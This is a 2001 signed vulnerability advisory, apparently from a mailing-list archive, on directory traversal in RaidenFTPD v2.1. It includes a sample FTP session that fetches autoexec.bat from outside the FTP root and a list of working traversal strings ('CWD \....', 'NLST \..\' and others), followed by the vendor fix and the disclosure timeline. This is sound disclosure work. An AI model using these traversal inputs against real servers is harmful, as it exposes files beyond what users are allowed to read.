----- Begin Hush Signed Message from joetestaat_private ----- Vulnerabilities in RaidenFTPD Server Overview RaidenFTPD v2.1 is an ftp server available from http://playstation2.idv.tw/raidenftpd. Vulnerabilities exist which allow users to break out of the ftp root. Details The following is an illustration of the problem: > ftp localhost 220-This FTP site is running free version of RaidenFTPD 220-Download chinese version from http://playstation2.idv.tw/raiden-ftpd- site/ 220-Download english version from http://playstation2.idv.tw/raidenftpd/ 220-RaidenFTPD32 for RaidenFTPD (up since 2001/04/20 15:00) 220-This server is for private use only 220-If you do not have access to this server 220-Please disconnect now 220 Please enter your login name now. User (xxxxxxxx.rh.rit.edu:(none)): jdog 331 Password required for jdog . Password: [really long login banner edited out] 230 User jdog logged in , proceed. ftp> get ....\....\autoexec.bat 200 Port command ok. 150 Sending /....\....\autoexec.bat (419 bytes). Mode STREAM Type ASCII 226-Ñ+ª+¦s+uññ_zª@ ñU¦¦ : 419 ª_ñ+_+ ñW¦¦ : 0 ª_ñ+_+ 226-¦¦½ßñ@ª+ñU¦¦¬¦¦t½+¼O : 419 kb/sec _zª¦ Unlimited kb ¬¦ñU¦¦+B½+ 226-Ñ+½e¬¦Ñ++²¼O / 226 Transfer finished successfully. Data connection closed. ftp: 419 bytes received in 0.27Seconds 1.55Kbytes/sec. ftp> cd .... 250-ª¦Ñ++²¦-ñU¬+¦í 1323 mb 250 "/.." is current directory. This excerpt was taken from a session involving build #947. The vendor released four builds since I initially contacted them to address additional variations. The following is a list of vulnerabilities which affected these intermediate versions: CWD \.... CWD *\..... CWD /..../ NLST .. NLST ... NLST \..\ NLST \...\ Solution Upgrade to build #952 at: http://playstation2.idv.tw/raidenftpd/download.html Vendor Status Team JohnLong was contacted via <jlkat_private> on Friday, April 20, 2001. They quickly responded and worked diligently on the problems until all issues were fixed. - Joe Testa e-mail: joetestaat_private web page: http://hogs.rit.edu/~joet AIM: LordSpankatron ----- Begin Hush Signature v1.3 ----- DETiFUfoDmGE9uJrpJQgFYn0g6gsy4jHJP1HF9UYGCGXml8h83eoWF/cf5RQyGkHmr0R ugydtjBf8iVLc0IMCfWMvOjYr0nlTaD61+gMW3L+2f2e1B2Q4S4h2Stlr2KYtGgCWy1S 6mTEVkFx7gYyQkA/U3cTf6anmWXsdqQRpldlQQCr8J4HfW4chdqUNg9mSyffhX8Lin6S bx5br4lSTfcnxcJLZjtfNK/r1H2/dPv/3JGf1YbIBK/2SusAvyhaNibLfE9rIBfSB+Tn L169d/o0fSk9zJMceIzXPqv12AgXyeqPSlOdc647BsSSCH1GyyojWy+4YHnAeCfzenps OjB7vBfW3OoRgNsLqVk1kd10vtOGjZmz+axV+LaVbatnG6qeo2ymkYX7sJRnf5LI+8CR /O7vxrzfNxjqHsc0FIHLa6/FFZDG570D3SZYdsX3rPXCBzUV11xp4SJ0KsZsGIy33OnD 9H9lWZeoDNOnJE4/2WKw+y8KE5Io/BDeXrmW63LeHeSS ----- End Hush Signature v1.3 ----- This message has been signed with a Hush Digital Signature. To verify the signature, please go to www.hush.com/tools Free, encrypted, secure Web-based email at www.hushmail.com
This archive was generated by hypermail 2b30 : Wed Apr 25 2001 - 23:12:04 PDT